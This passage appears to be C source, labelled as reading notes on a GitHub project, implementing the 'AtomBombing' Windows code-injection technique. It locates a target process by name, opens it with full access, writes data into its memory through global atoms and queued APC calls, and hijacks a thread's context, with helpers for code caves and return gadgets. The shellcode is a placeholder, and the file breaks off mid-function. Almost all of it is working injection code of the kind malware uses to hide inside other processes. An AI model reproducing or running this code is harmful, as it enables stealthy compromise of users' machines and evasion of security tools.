// Github 上开源项目 阅读笔记
#include <stdio.h>
#include <Windows.h>
#include <TlHelp32.h>
#include <winternl.h>
#define SHELLCODE ("haha")
#define RTL_MAXIMUM_ATOM_LENGTH (255)
#define SHELLCODE_FUNCTION_POINTERS_OFFSET (25)
#define X86_RET ('xc3')
#define TEXT_SECTION (".text")
#define DATA_SECTION (".data")
#define NTDLL ("ntdll.dll")
#define KERNEL32 ("kernel32.dll")
#define NTSETCONTEXTTHREAD ("NtSetContextThread")
#define NTWAITFORSINGLEOBJECT ("NtWaitForSingleObject")
#define MEMCPY ("memcpy")
#define GETPROCADDRESS ("GetProcAddress")
#define LOADLIBRARYA ("LoadLibraryA")
#define GLOBALGETATOMNAMEW ("GlobalGetAtomNameW")
#define NTQUEUEAPCTHREAD ("NtQueueApcThread")
#define WAITFORSINGLEOBJECTEX ("WaitForSingleObjectEx")
typedef VOID(*PKNORMAL_ROUTINE)(PVOID NormalContext,
PVOID SystemArgument1,
PVOID SystemArgument2
);
typedef ULONG(WINAPI * _NtQueueApcThread)(HANDLE ThreadHandle,
PKNORMAL_ROUTINE ApcRoutine,
PVOID NormalContext,
PVOID SystemArgument1,
PVOID SystemArgument2
);
typedef NTSTATUS(NTAPI *_NtQueryInformationProcess)(
HANDLE ProcessHandle,
DWORD ProcessInformationClass,
PVOID ProcessInformation,
DWORD ProcessInformationLength,
PDWORD ReturnLength
);
#pragma pack(push, 1)
typedef struct _FUNCTIONPOINTERS
{
void *pfnLoadLibraryA;
void *pfnGetProcAddress;
} FUNCTIONPOINTERS, *PFUNCTIONPOINTERS;
#pragma pack(pop)
typedef enum _ESTATUS
{
ESTATUS_INVALID = -1,
ESTATUS_SUCCESS = 0,
ESTATUS_MAIN_NTQUEUEAPCTHREADWRAPPER_NTQUEUEAPCTHREAD_FAILED = 0x100,
ESTATUS_MAIN_ADDNULLTERMINATEDATOMANDVERIFYW_GLOBALADDATOMW_FAILED,
ESTATUS_MAIN_DOESSTRINGCONTAINNULLTERMINATORW_WCSCHR_FAILED,
ESTATUS_MAIN_GETTHREADTEBADDRESS_NTQUERYINFORMATIONTHREAD_ERROR,
ESTATUS_MAIN_OPENPROCESSBYNAME_OPENPROCESS_ERROR,
ESTATUS_MAIN_GETPROCESSIDBYNAME_CREATETOOLHELP32SNAPSHOT_ERROR,
ESTATUS_MAIN_GETPROCESSIDBYNAME_PROCESS32FIRST_ERROR,
ESTATUS_MAIN_GETPROCESSIDBYNAME_PROCESS_NOT_FOUND,
ESTATUS_MAIN_GETTHREADTEBADDRESS_GETTHREADSELECTORENTRY_FAILED,
ESTATUS_MAIN_NTQUEUEAPCTHREADWRAPPERANDKEEPALERTABLE_SUSPENDTHREAD_FAILED,
ESTATUS_MAIN_NTQUEUEAPCTHREADWRAPPERANDKEEPALERTABLE_RESUMETHREAD_FAILED,
ESTATUS_MAIN_QUEUEUSERAPCWRAPPERANDKEEPALERTABLE_SUSPENDTHREAD_FAILED,
ESTATUS_MAIN_QUEUEUSERAPCWRAPPERANDKEEPALERTABLE_RESUMETHREAD_FAILED,
ESTATUS_MAIN_QUEUEUSERAPCWRAPPERANDKEEPALERTABLE_QUEUEUSERAPC_FAILED,
ESTATUS_MAIN_APCWRITEPROCESSMEMORYNULLTERMINATEDINTERNAL_BUFFER_CONTAINS_NULL,
ESTATUS_MAIN_FINDALERTABLETHREAD_NO_ALERTABLE_THREADS_FOUND,
ESTATUS_MAIN_GETTHREADCONTEXT_SUSPENDTHREAD_FAILED,
ESTATUS_MAIN_GETTHREADCONTEXT_GETTHREADCONTEXT_FAILED,
ESTATUS_MAIN_GETTHREADCONTEXT_RESUMETHREAD_FAILED,
ESTATUS_MAIN_GETSECTIONHEADER_SECTION_NOT_FOUND,
ESTATUS_MAIN_GETCODECAVEADDRESS_GETMODULEHANDLEA_FAILED,
ESTATUS_MAIN_FINDRETGADGET_GETMODULEHANDLEA_FAILED,
ESTATUS_MAIN_FINDRETGADGET_RET_GADGET_NOT_FOUND,
ESTATUS_GETFUNCTIONADDRESSFROMDLL_GETMODULEHANDLEA_FAILED,
ESTATUS_GETFUNCTIONADDRESSFROMDLL_GETPROCADDRESS_FAILED,
ESTATUS_MAIN_ISPROCESSMEMORYEQUAL_HEAPALLOC_FAILED,
ESTATUS_MAIN_ISPROCESSMEMORYEQUAL_READPROCESSMEMORY_FAILED,
ESTATUS_MAIN_ISPROCESSMEMORYEQUAL_READPROCESSMEMORY_MISMATCH,
ESTATUS_MAIN_ADDNULLTERMINATEDATOMANDVERIFYW_GLOBALDELETEATOM_FAILED,
ESTATUS_MAIN_WASATOMWRITTENSUCCESSFULLY_GLOBALGETATOMNAMEW_FAILED,
ESTATUS_MAIN_WASATOMWRITTENSUCCESSFULLY_HEAPALLOC_FAILED,
ESTATUS_MAIN_ENUMPROCESSTHREADS_OPENTHREAD_FAILED,
ESTATUS_MAIN_FINDALERTABLETHREAD_HEAPALLOC_FAILED,
ESTATUS_MAIN_FINDALERTABLETHREAD_HEAPALLOC2_FAILED,
ESTATUS_MAIN_FINDALERTABLETHREAD_CREATEEVENT_FAILED,
ESTATUS_MAIN_FINDALERTABLETHREAD_DUPLICATEHANDLE_FAILED,
ESTATUS_MAIN_FINDALERTABLETHREAD_WAITFORMULTIPLEOBJECTS_FAILED,
} ESTATUS, *PESTATUS;
#define ESTATUS_FAILED(eStatus) (ESTATUS_SUCCESS != eStatus)
ESTATUS GetFunctionAddressFromDll(
PSTR pszDllName,
PSTR pszFunctionName,
PVOID *ppvFunctionAddress
)
{
HMODULE hModule = NULL;
PVOID pvFunctionAddress = NULL;
ESTATUS eReturn = ESTATUS_INVALID;
hModule = GetModuleHandleA(pszDllName);
if (NULL == hModule)
{
eReturn = ESTATUS_GETFUNCTIONADDRESSFROMDLL_GETMODULEHANDLEA_FAILED;
goto lblCleanup;
}
pvFunctionAddress = GetProcAddress(hModule, pszFunctionName);
if (NULL == pvFunctionAddress)
{
eReturn = ESTATUS_GETFUNCTIONADDRESSFROMDLL_GETPROCADDRESS_FAILED;
goto lblCleanup;
}
*ppvFunctionAddress = pvFunctionAddress;
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
ESTATUS main_WasAtomWrittenSuccessfully(
ATOM tAtom,
PWSTR pswzExpectedBuffer,
PBOOL pbWasAtomWrittenSuccessfully
)
{
LPWSTR pswzCheckBuffer = NULL;
DWORD cbCheckBuffer = 0;
ESTATUS eReturn = ESTATUS_INVALID;
UINT uiRet = 0;
HMODULE hUser32 = NULL;
BOOL bWasAtomWrittenSuccessfully = FALSE;
// If user32.dll is not loaded, the ATOM functions return access denied.For more details see :
// http://www.tech-archive.net/Archive/Development/microsoft.public.win32.programmer.kernel/2004-03/0851.html
hUser32 = LoadLibrary(L"user32.dll");
if (NULL == hUser32)
{
goto lblCleanup;
}
cbCheckBuffer = (wcslen(pswzExpectedBuffer) + 1) * sizeof(WCHAR);
pswzCheckBuffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cbCheckBuffer);
if (NULL == pswzCheckBuffer)
{
printf("HeapAlloc failed. GLE: 0x%X (%d)
", GetLastError(), GetLastError());
eReturn = ESTATUS_MAIN_WASATOMWRITTENSUCCESSFULLY_HEAPALLOC_FAILED;
goto lblCleanup;
}
uiRet = GlobalGetAtomNameW(tAtom, pswzCheckBuffer, cbCheckBuffer);
if (0 == uiRet)
{
printf("GlobalGetAtomNameA failed. GLE: 0x%X (%d)
", GetLastError(), GetLastError());
eReturn = ESTATUS_MAIN_WASATOMWRITTENSUCCESSFULLY_GLOBALGETATOMNAMEW_FAILED;
goto lblCleanup;
}
bWasAtomWrittenSuccessfully = (0 == memcmp(pswzCheckBuffer, pswzExpectedBuffer, cbCheckBuffer));
eReturn = ESTATUS_SUCCESS;
*pbWasAtomWrittenSuccessfully = bWasAtomWrittenSuccessfully;
lblCleanup:
if (NULL != pswzCheckBuffer)
{
HeapFree(GetProcessHeap(), 0, pswzCheckBuffer);
pswzCheckBuffer = NULL;
}
return eReturn;
}
ESTATUS main_AddNullTerminatedAtomAndVerifyW(LPWSTR pswzBuffer, ATOM *ptAtom)
{
ATOM tAtom = 0;
ESTATUS eReturn = ESTATUS_INVALID;
LPWSTR pswzCheckBuffer = NULL;
DWORD cbCheckBuffer = 0;
UINT uiRet = 0;
HMODULE hUser32 = NULL;
BOOL bWasAtomWrittenSuccessfully = FALSE;
// If user32.dll is not loaded, the ATOM functions return access denied. For more details see :
// http://www.tech-archive.net/Archive/Development/microsoft.public.win32.programmer.kernel/2004-03/0851.html
hUser32 = LoadLibrary(L"user32.dll");
do
{
tAtom = GlobalAddAtomW(pswzBuffer);
if (0 == tAtom)
{
printf("GlobalAddAtomA failed. GLE: 0x%X (%d)
", GetLastError(), GetLastError());
eReturn = ESTATUS_MAIN_ADDNULLTERMINATEDATOMANDVERIFYW_GLOBALADDATOMW_FAILED;
goto lblCleanup;
}
eReturn = main_WasAtomWrittenSuccessfully(tAtom, pswzBuffer, &bWasAtomWrittenSuccessfully);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
if (FALSE != bWasAtomWrittenSuccessfully)
{
break;
}
for (int i = 0; i < 0x2; i++)
{
SetLastError(ERROR_SUCCESS);
GlobalDeleteAtom(tAtom);
if (ERROR_SUCCESS != GetLastError())
{
eReturn = ESTATUS_MAIN_ADDNULLTERMINATEDATOMANDVERIFYW_GLOBALDELETEATOM_FAILED;
goto lblCleanup;
}
}
} while (FALSE == bWasAtomWrittenSuccessfully);
eReturn = ESTATUS_SUCCESS;
*ptAtom = tAtom;
lblCleanup:
return eReturn;
}
ESTATUS main_NtQueueApcThreadWrapper(
HANDLE hThread,
PKNORMAL_ROUTINE pfnApcRoutine,
PVOID pvArg1,
PVOID pvArg2,
PVOID pvArg3
)
{
HMODULE hNtDll = NULL;
HMODULE hKernel32 = NULL;
HMODULE hUser32 = NULL;
_NtQueueApcThread NtQueueApcThread = NULL;
NTSTATUS ntStatus = NULL;
ESTATUS eReturn = ESTATUS_INVALID;
// If user32.dll is not loaded, the ATOM functions return access denied. For more details see:
// http://www.tech-archive.net/Archive/Development/microsoft.public.win32.programmer.kernel/2004-03/0851.html
hUser32 = LoadLibrary(L"user32.dll");
hKernel32 = GetModuleHandle(L"kernel32.dll");
hNtDll = GetModuleHandle(L"ntdll.dll");
eReturn = GetFunctionAddressFromDll(
NTDLL,
NTQUEUEAPCTHREAD,
(PVOID *)&NtQueueApcThread
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
ntStatus = NtQueueApcThread(
hThread,
pfnApcRoutine,
pvArg1,
pvArg2,
pvArg3
);
if (0 != ntStatus)
{
printf("NtQueueApcThread failed. ret: 0x%X (%d)
", ntStatus, ntStatus);
eReturn = ESTATUS_MAIN_NTQUEUEAPCTHREADWRAPPER_NTQUEUEAPCTHREAD_FAILED;
goto lblCleanup;
}
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
ESTATUS main_NtQueueApcThreadWaitForSingleObjectEx(
HANDLE hRemoteThread,
HANDLE hWaitHandle,
DWORD dwWaitMilliseconds,
BOOL bWaitAlertable
)
{
ESTATUS eReturn = ESTATUS_INVALID;
PKNORMAL_ROUTINE pfnWaitForSingleObjectEx = NULL;
eReturn = GetFunctionAddressFromDll(
KERNEL32,
WAITFORSINGLEOBJECTEX,
(PVOID *)&pfnWaitForSingleObjectEx
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
eReturn = main_NtQueueApcThreadWrapper(
hRemoteThread,
pfnWaitForSingleObjectEx,
hWaitHandle,
(PVOID)dwWaitMilliseconds,
(PVOID)bWaitAlertable
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
ESTATUS main_QueueUserApcWrapperAndKeepAlertable(
HANDLE hThread,
PAPCFUNC pfnAPC,
ULONG_PTR dwData
)
{
ESTATUS eReturn = ESTATUS_INVALID;
DWORD dwErr = FALSE;
dwErr = SuspendThread(hThread);
if (((DWORD)-1) == dwErr)
{
eReturn = ESTATUS_MAIN_QUEUEUSERAPCWRAPPERANDKEEPALERTABLE_SUSPENDTHREAD_FAILED;
printf("SuspendThread failed. GLE: %d.", GetLastError());
goto lblCleanup;
}
dwErr = QueueUserAPC(pfnAPC, hThread, dwData);
if (0 == dwErr)
{
eReturn = ESTATUS_MAIN_QUEUEUSERAPCWRAPPERANDKEEPALERTABLE_QUEUEUSERAPC_FAILED;
printf("SuspendThread failed. GLE: %d.", GetLastError());
goto lblCleanup;
}
eReturn = main_NtQueueApcThreadWaitForSingleObjectEx(
hThread,
GetCurrentThread(),
5000,
TRUE
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
dwErr = ResumeThread(hThread);
if (((DWORD)-1) == dwErr)
{
printf("ResumeThread failed. GLE: %d.", GetLastError());
eReturn = ESTATUS_MAIN_QUEUEUSERAPCWRAPPERANDKEEPALERTABLE_RESUMETHREAD_FAILED;
goto lblCleanup;
}
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
ESTATUS main_NtQueueApcThreadWrapperAndKeepAlertable(
HANDLE hThread,
PKNORMAL_ROUTINE pfnApcRoutine,
PVOID pvArg1,
PVOID pvArg2,
PVOID pvArg3
)
{
ESTATUS eReturn = ESTATUS_INVALID;
DWORD dwErr = FALSE;
dwErr = SuspendThread(hThread);
if (((DWORD)-1) == dwErr)
{
eReturn = ESTATUS_MAIN_NTQUEUEAPCTHREADWRAPPERANDKEEPALERTABLE_SUSPENDTHREAD_FAILED;
printf("SuspendThread failed. GLE: %d.", GetLastError());
goto lblCleanup;
}
eReturn = main_NtQueueApcThreadWrapper(
hThread,
pfnApcRoutine,
pvArg1,
pvArg2,
pvArg3
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
eReturn = main_NtQueueApcThreadWaitForSingleObjectEx(
hThread,
GetCurrentThread(),
5000,
TRUE
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
dwErr = ResumeThread(hThread);
if (((DWORD)-1) == dwErr)
{
printf("ResumeThread failed. GLE: %d.", GetLastError());
eReturn = ESTATUS_MAIN_NTQUEUEAPCTHREADWRAPPERANDKEEPALERTABLE_RESUMETHREAD_FAILED;
goto lblCleanup;
}
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
ESTATUS main_ApcSetEventAndKeepAlertable(HANDLE hThread, HANDLE hRemoteHandle)
{
ESTATUS eReturn = ESTATUS_INVALID;
eReturn = main_QueueUserApcWrapperAndKeepAlertable(
hThread,
(PAPCFUNC)SetEvent,
(ULONG_PTR)hRemoteHandle
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
ESTATUS main_ApcSetThreadContextInternal(HANDLE hThread, PCONTEXT ptContext)
{
PKNORMAL_ROUTINE pfnSetThreadContext = NULL;
ESTATUS eReturn = ESTATUS_INVALID;
eReturn = GetFunctionAddressFromDll(
NTDLL,
NTSETCONTEXTTHREAD,
(PVOID *)&pfnSetThreadContext
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
eReturn = main_NtQueueApcThreadWrapper(
hThread,
pfnSetThreadContext,
GetCurrentThread(),
(PVOID)ptContext,
(PVOID)NULL
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
ESTATUS main_DoesStringContainNullTerminatorW(
PVOID pvBuffer,
DWORD dwBufferSize,
PBOOL pbDoesStringContainUnicodeNullTerminator
)
{
PWCHAR pwcPos = NULL;
ESTATUS eReturn = ESTATUS_INVALID;
pwcPos = wcschr((LPWSTR)pvBuffer, UNICODE_NULL);
if (0 == pwcPos)
{
eReturn = ESTATUS_MAIN_DOESSTRINGCONTAINNULLTERMINATORW_WCSCHR_FAILED;
goto lblCleanup;
}
if ((DWORD)(pwcPos - (PWCHAR)pvBuffer) == (dwBufferSize / sizeof(WCHAR) - 1))
{
*pbDoesStringContainUnicodeNullTerminator = FALSE;
}
else
{
*pbDoesStringContainUnicodeNullTerminator = TRUE;
}
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
ESTATUS main_ApcWriteProcessMemoryNullTerminatedInternal(
HANDLE hThread,
PVOID pvBaseAddress,
PVOID pvBuffer,
DWORD dwBufferSize
)
{
ESTATUS eReturn = ESTATUS_INVALID;
DWORD dwIndex = 0;
HMODULE hKernel32 = NULL;
PKNORMAL_ROUTINE pfnGlobalGetAtomNameW = NULL;
BOOL bDoesStringContainUnicodeNullTerminator = FALSE;
hKernel32 = GetModuleHandle(L"kernel32.dll");
eReturn = GetFunctionAddressFromDll(
KERNEL32,
GLOBALGETATOMNAMEW,
(PVOID *)&pfnGlobalGetAtomNameW
);
eReturn = main_DoesStringContainNullTerminatorW(
pvBuffer,
dwBufferSize,
&bDoesStringContainUnicodeNullTerminator
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
if (FALSE != bDoesStringContainUnicodeNullTerminator)
{
eReturn = ESTATUS_MAIN_APCWRITEPROCESSMEMORYNULLTERMINATEDINTERNAL_BUFFER_CONTAINS_NULL;
goto lblCleanup;
}
for (dwIndex = 0; dwIndex < dwBufferSize; dwIndex += (RTL_MAXIMUM_ATOM_LENGTH) * sizeof(WCHAR))
{
ATOM tAtom = 0;
CHAR acBuffer[(RTL_MAXIMUM_ATOM_LENGTH + 1) * sizeof(WCHAR)] = { 0 };
DWORD cbBlockSize = 0;
if ((dwBufferSize - sizeof(WCHAR)) - dwIndex < (sizeof(acBuffer) - sizeof(WCHAR)))
{
cbBlockSize = ((dwBufferSize - sizeof(WCHAR)) - dwIndex);
}
else
{
cbBlockSize = sizeof(acBuffer) - sizeof(WCHAR);
}
(VOID)memcpy(acBuffer, (PVOID)((DWORD)pvBuffer + dwIndex), cbBlockSize);
eReturn = main_AddNullTerminatedAtomAndVerifyW((LPWSTR)acBuffer, &tAtom);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
eReturn = main_NtQueueApcThreadWrapperAndKeepAlertable(
hThread,
pfnGlobalGetAtomNameW,
(PVOID)tAtom,
((PUCHAR)pvBaseAddress) + dwIndex,
(PVOID)(cbBlockSize + sizeof(WCHAR))
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
}
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
ESTATUS main_IsProcessMemoryEqual(
HANDLE hProcess,
PVOID pvRemoteAddress,
PVOID pvExpectedBuffer,
DWORD cbExpectedBufferSize,
PBOOL pbIsMemoryEqual
)
{
ESTATUS eReturn = ESTATUS_INVALID;
PVOID pvTempBuffer = NULL;
DWORD dwNumberOfBytesRead = 0;
BOOL bErr = FALSE;
BOOL bIsMemoryEqual = FALSE;
pvTempBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cbExpectedBufferSize);
if (NULL == pvTempBuffer)
{
eReturn = ESTATUS_MAIN_ISPROCESSMEMORYEQUAL_HEAPALLOC_FAILED;
goto lblCleanup;
}
bErr = ReadProcessMemory(
hProcess,
pvRemoteAddress,
pvTempBuffer,
cbExpectedBufferSize,
&dwNumberOfBytesRead
);
if (FALSE == bErr)
{
eReturn = ESTATUS_MAIN_ISPROCESSMEMORYEQUAL_READPROCESSMEMORY_FAILED;
printf("ReadProcessMemory error. GLE: %d.", GetLastError());
goto lblCleanup;
}
if (dwNumberOfBytesRead != cbExpectedBufferSize)
{
eReturn = ESTATUS_MAIN_ISPROCESSMEMORYEQUAL_READPROCESSMEMORY_MISMATCH;
goto lblCleanup;
}
if (0 == memcmp(pvTempBuffer, pvExpectedBuffer, cbExpectedBufferSize))
{
bIsMemoryEqual = TRUE;
}
eReturn = ESTATUS_SUCCESS;
*pbIsMemoryEqual = bIsMemoryEqual;
lblCleanup:
if (NULL != pvTempBuffer)
{
HeapFree(GetProcessHeap(), 0, pvTempBuffer);
pvTempBuffer = NULL;
}
return eReturn;
}
ESTATUS main_ApcWriteProcessMemoryNullTerminated(
HANDLE hProcess,
HANDLE hThread,
PVOID pvBaseAddress,
PVOID pvBuffer,
DWORD dwBufferSize
)
{
ESTATUS eReturn = ESTATUS_INVALID;
BOOL bShouldStop = FALSE;
do
{
eReturn = main_ApcWriteProcessMemoryNullTerminatedInternal(
hThread,
pvBaseAddress,
pvBuffer,
dwBufferSize
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
Sleep(100);
eReturn = main_IsProcessMemoryEqual(
hProcess,
pvBaseAddress,
pvBuffer,
dwBufferSize,
&bShouldStop
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
if (FALSE == bShouldStop)
{
printf("[*] Data chunk written incorrectly, retrying...
");
}
} while (FALSE == bShouldStop);
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
ESTATUS main_ApcWriteProcessMemoryInternal(
HANDLE hProcess,
HANDLE hThread,
PVOID pvBaseAddress,
PVOID pvBuffer,
DWORD dwBufferSize
)
{
PWCHAR pwcPos = NULL;
ESTATUS eReturn = ESTATUS_INVALID;
PVOID pvTempBuffer = NULL;
PVOID pvLocalBufferPointer = pvBuffer;
PVOID pvRemoteBufferPointer = pvBaseAddress;
DWORD dwBytesWritten = 0;
while (pvLocalBufferPointer < (PUCHAR)pvBuffer + dwBufferSize)
{
DWORD cbTempBufferSize = 0;
pwcPos = (PWCHAR)pvLocalBufferPointer + wcsnlen_s(
(LPWSTR)pvLocalBufferPointer,
(dwBufferSize - dwBytesWritten) / sizeof(WCHAR)
);
if (0 == pwcPos)
{
goto lblCleanup;
}
if (pvLocalBufferPointer == pwcPos)
{
pvRemoteBufferPointer = (PUCHAR)pvRemoteBufferPointer + sizeof(UNICODE_NULL);
pvLocalBufferPointer = (PUCHAR)pvLocalBufferPointer + sizeof(UNICODE_NULL);
dwBytesWritten += sizeof(UNICODE_NULL);
continue;
}
cbTempBufferSize = (PUCHAR)pwcPos - (PUCHAR)pvLocalBufferPointer;
pvTempBuffer = HeapAlloc(
GetProcessHeap(),
HEAP_ZERO_MEMORY,
cbTempBufferSize + sizeof(UNICODE_NULL)
);
if (NULL == pvTempBuffer)
{
goto lblCleanup;
}
memcpy(pvTempBuffer, pvLocalBufferPointer, cbTempBufferSize);
eReturn = main_ApcWriteProcessMemoryNullTerminated(
hProcess,
hThread,
pvRemoteBufferPointer,
pvTempBuffer,
cbTempBufferSize + sizeof(UNICODE_NULL)
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
pvRemoteBufferPointer = (PUCHAR)pvRemoteBufferPointer + cbTempBufferSize;
pvLocalBufferPointer = (PUCHAR)pvLocalBufferPointer + cbTempBufferSize;
dwBytesWritten += cbTempBufferSize;
if (NULL != pvTempBuffer)
{
HeapFree(GetProcessHeap(), 0, pvTempBuffer);
pvTempBuffer = NULL;
}
}
eReturn = ESTATUS_SUCCESS;
lblCleanup:
if (NULL != pvTempBuffer)
{
HeapFree(GetProcessHeap(), 0, pvTempBuffer);
pvTempBuffer = NULL;
}
return eReturn;
}
ESTATUS main_ApcWriteProcessMemory(
HANDLE hProcess,
HANDLE hThread,
PVOID pvBaseAddress,
PVOID pvBuffer,
DWORD dwBufferSize
)
{
ESTATUS eReturn = ESTATUS_INVALID;
BOOL bShouldStop = FALSE;
do
{
eReturn = main_ApcWriteProcessMemoryInternal(
hProcess,
hThread,
pvBaseAddress,
pvBuffer,
dwBufferSize
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
Sleep(100);
eReturn = main_IsProcessMemoryEqual(
hProcess,
pvBaseAddress,
pvBuffer,
dwBufferSize,
&bShouldStop
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
if (bShouldStop)
{
printf("[*] New verification: Data chunk written successfully.
");
break;
}
printf("[*] New Verification: Data written incorrectly, retrying...
");
} while (TRUE);
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
ESTATUS main_ApcSetThreadContext(
HANDLE hProcess,
HANDLE hThread,
PCONTEXT ptContext,
PVOID pvRemoteAddress
)
{
ESTATUS eReturn = ESTATUS_INVALID;
eReturn = main_ApcWriteProcessMemory(
hProcess,
hThread,
(PVOID)((PUCHAR)pvRemoteAddress),
ptContext,
FIELD_OFFSET(CONTEXT, ExtendedRegisters)
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
eReturn = main_ApcSetThreadContextInternal(hThread, (PCONTEXT)((PUCHAR)pvRemoteAddress));
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
ESTATUS main_ApcCopyFunctionPointers(
HANDLE hProcess,
HANDLE hThread,
PVOID pvRemoteAddress
)
{
ESTATUS eReturn = ESTATUS_INVALID;
FUNCTIONPOINTERS tFunctionPointers = { 0 };
eReturn = GetFunctionAddressFromDll(
KERNEL32,
LOADLIBRARYA,
&tFunctionPointers.pfnLoadLibraryA
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
eReturn = GetFunctionAddressFromDll(
KERNEL32,
GETPROCADDRESS,
&tFunctionPointers.pfnGetProcAddress
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
eReturn = main_ApcWriteProcessMemory(
hProcess,
hThread,
pvRemoteAddress,
&tFunctionPointers,
sizeof(tFunctionPointers)
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
ESTATUS main_GetProcessIdByName(LPWSTR pszProcessName, PDWORD pdwProcessId)
{
DWORD dwProcessId = 0;
HANDLE hSnapshot = NULL;
PROCESSENTRY32 pe = { 0 };
ESTATUS eReturn = ESTATUS_INVALID;
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (NULL == hSnapshot)
{
eReturn = ESTATUS_MAIN_GETPROCESSIDBYNAME_CREATETOOLHELP32SNAPSHOT_ERROR;
printf("CreateToolhelp32Snapshot error. GLE: %d.", GetLastError());
goto lblCleanup;
}
pe.dwSize = sizeof(PROCESSENTRY32);
if (FALSE == Process32First(hSnapshot, &pe))
{
eReturn = ESTATUS_MAIN_GETPROCESSIDBYNAME_PROCESS32FIRST_ERROR;
printf("Process32First error. GLE: %d.", GetLastError());
goto lblCleanup;
}
do
{
if (NULL != wcsstr(pe.szExeFile, pszProcessName))
{
dwProcessId = pe.th32ProcessID;
break;
}
} while (Process32Next(hSnapshot, &pe));
if (0 == dwProcessId)
{
printf("[*] Process '%S' could not be found.
", pszProcessName);
eReturn = ESTATUS_MAIN_GETPROCESSIDBYNAME_PROCESS_NOT_FOUND;
goto lblCleanup;
}
printf("[*] Found process '%S'. PID: %d (0x%X).
", pszProcessName, dwProcessId, dwProcessId);
*pdwProcessId = dwProcessId;
eReturn = ESTATUS_SUCCESS;
lblCleanup:
if ((NULL != hSnapshot) && (INVALID_HANDLE_VALUE != hSnapshot))
{
CloseHandle(hSnapshot);
hSnapshot = NULL;
}
return eReturn;
}
ESTATUS main_OpenProcessByName(LPWSTR pszProcessName, PHANDLE phProcess)
{
HANDLE hProcess = NULL;
ESTATUS eReturn = ESTATUS_INVALID;
DWORD dwPid = 0;
eReturn = main_GetProcessIdByName(pszProcessName, &dwPid);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
hProcess = OpenProcess(
PROCESS_ALL_ACCESS,
FALSE,
dwPid
);
if (NULL == hProcess)
{
eReturn = ESTATUS_MAIN_OPENPROCESSBYNAME_OPENPROCESS_ERROR;
printf("OpenProcess error. GLE: %d.", GetLastError());
goto lblCleanup;
}
printf("[*] Opened process's handle: %d (0x%X).
", hProcess, hProcess);
*phProcess = hProcess;
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
ESTATUS main_GetSectionHeader(
HMODULE hModule,
PSTR pszSectionName,
PIMAGE_SECTION_HEADER *pptSectionHeader
)
{
PIMAGE_DOS_HEADER ptDosHeader = NULL;
PIMAGE_NT_HEADERS ptNtHeaders = NULL;
PIMAGE_SECTION_HEADER ptSectionHeader = NULL;
ESTATUS eReturn = ESTATUS_INVALID;
BOOL bFound = FALSE;
ptDosHeader = (PIMAGE_DOS_HEADER)hModule;
if (IMAGE_DOS_SIGNATURE != ptDosHeader->e_magic)
{
goto lblCleanup;
}
ptNtHeaders = (PIMAGE_NT_HEADERS)(((DWORD)ptDosHeader) + (PUCHAR)ptDosHeader->e_lfanew);
if (FALSE != IsBadReadPtr(ptNtHeaders, sizeof(IMAGE_NT_HEADERS)))
{
goto lblCleanup;
}
if (IMAGE_NT_SIGNATURE != ptNtHeaders->Signature)
{
goto lblCleanup;
}
ptSectionHeader = IMAGE_FIRST_SECTION(ptNtHeaders);
for (int i = 0; i < ptNtHeaders->FileHeader.NumberOfSections; i++)
{
if (0 == strncmp(pszSectionName, (PCHAR)ptSectionHeader->Name, IMAGE_SIZEOF_SHORT_NAME))
{
bFound = TRUE;
break;
}
ptSectionHeader++;
}
if (FALSE == bFound)
{
eReturn = ESTATUS_MAIN_GETSECTIONHEADER_SECTION_NOT_FOUND;
goto lblCleanup;
}
eReturn = ESTATUS_SUCCESS;
*pptSectionHeader = ptSectionHeader;
lblCleanup:
return eReturn;
}
ESTATUS main_GetCodeCaveAddress(PVOID *ppvCodeCave)
{
PIMAGE_SECTION_HEADER ptSectionHeader = NULL;
PVOID pvCodeCave = NULL;
